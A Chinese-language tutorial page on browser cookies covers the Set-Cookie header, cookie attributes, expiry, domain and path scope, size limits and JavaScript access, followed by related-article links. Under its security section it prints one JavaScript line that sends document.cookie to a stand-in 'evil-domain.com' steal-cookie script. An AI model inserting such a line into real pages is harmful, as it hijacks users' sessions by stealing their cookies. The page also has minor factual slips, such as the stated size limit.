资讯专栏INFORMATION COLUMN

前端存储 (1) -- Cookie

zhangyucha0 / 1003人阅读

摘要:浏览器收到响应后通常会保存下,之后对该服务器每一次请求中都通过请求头部将信息发送给服务器。另外,的过期时间域路径有效期适用站点都可以根据需要来指定。存储大小个字节,多了浏览器会默默删掉访问安全问题

目录

创建

组成

生命周期

作用域

存储大小

创建Cookie

当服务器收到HTTP请求时,服务器可以在响应头里面添加一个Set-Cookie选项。
浏览器收到响应后通常会保存下Cookie,
之后对该服务器每一次请求中都通过Cookie请求头部将Cookie信息发送给服务器。
另外,Cookie的过期时间、域、路径、有效期、适用站点都可以根据需要来指定。

服务器使用Set-Cookie响应头部向用户代理(一般是浏览器)发送Cookie信息。一个简单的Cookie可能像这样:

  Set-Cookie: =
  response.setHeader("Set-Cookie", ["type=ninja","username=123qad", "language=javascript"]);
组成

Name

Value

Domain

Path

Expires/ Max-Age 过期时间

Size

Http

Secure 是否加密,标记为Secure 只会通过 htpps 协议传输, http 是不能设置的

SameSite

组成

生命周期

默认是浏览器关闭就清掉, 一般会设置 指定过期时间(Expires)或者有效期(Max-Age)
需要注意的是,有些浏览器提供了会话恢复功能,这种情况下即使关闭了浏览器,会话期Cookie也会被保留下来,就好像浏览器从来没有关闭一样。

Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT;
作用域

Domain (域名)和 Path 标识定义了Cookie的作用域:即Cookie应该发送给哪些URL。

Cookie 的Domain 属性可以设置 Cookie 发送哪些 url,默认是在当前域名下,但有时候我们可能几个站点想共享Cookie 信息
比方 qq空间(qq.tentxun.com)登陆了,我想点进 qq 邮箱(mail.tenxun.com), 那要是再登陆一次,用户爸爸肯定受不了,所以通过设置
cookie 的 domain 为 ".tenxun.com",从 qq空间点击链接 进入 qq 邮箱, qq邮箱 通过 cookie 信息,获取用户信息,就可以不用再次登陆了

如果设置 Domain=mozilla.org,则Cookie也包含在子域名中(如developer.mozilla.org)。

存储大小

4097个字节, 多了浏览器会默默删掉

javascript 访问 Cookie
 var cookie = document.cookie;
 document.cookie = "username=tt";
安全问题

(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/96162.html

相关文章

  • [聊一聊系列]聊一聊前端存储那些事儿

    摘要:如图图顾名思义,,是级别的存储。如笔者写的一篇浅析文章聊一聊百度移动端首页前端速度那些事儿读者们可以尝试使用。 欢迎大家收看聊一聊系列,这一套系列文章,可以帮助前端工程师们了解前端的方方面面(不仅仅是代码):https://segmentfault.com/blog/frontenddriver 在web开发越来越复杂的今天,前端拥有的能力也越来越多。其中最重要的一项莫过于web存储。...

    caige 评论0 收藏0
  • 前端存储

    摘要:前端存储简介一种在前端保存数据的思想。为了保证前端性能,一般不会保存大量数据。在手动删除前一直存在关闭当前页面后被清除可存放大小与服务器通信每次都在头部信息中。 前端存储 简介 一种在前端保存数据的思想。第一次在页面中的保存数据,那么从第二次开始就可以使用了。可以使用的方法有: cookie localeStorage sessionStorage ie的userData web s...

    luckyw 评论0 收藏0
  • 前端存储

    摘要:前端存储简介一种在前端保存数据的思想。为了保证前端性能,一般不会保存大量数据。在手动删除前一直存在关闭当前页面后被清除可存放大小与服务器通信每次都在头部信息中。 前端存储 简介 一种在前端保存数据的思想。第一次在页面中的保存数据,那么从第二次开始就可以使用了。可以使用的方法有: cookie localeStorage sessionStorage ie的userData web s...

    binaryTree 评论0 收藏0
  • 前端分享之cookie的使用及单点登录

    摘要:两个域之间是不是存在跨域问题,主要是根据协议域名端口号这三个点进行判断,只要有一个不一样就是跨域。例如协议不同与域名不同与端口号不同与浏览器默认情况下无法主动跨域向后端发送,需要在前端请求时加入配置项。据此,可以实现单点登录。 cookie是什么 cookie的英文意思是饼干。在计算机术语中指服务端存放在客户端的一段数据。这段数据在客户端每次进行http请求时会自动加在http请求报文...

    Backache 评论0 收藏0

发表评论

0条评论

zhangyucha0

|高级讲师

TA的文章

阅读更多
最新活动
阅读需要支付1元查看
<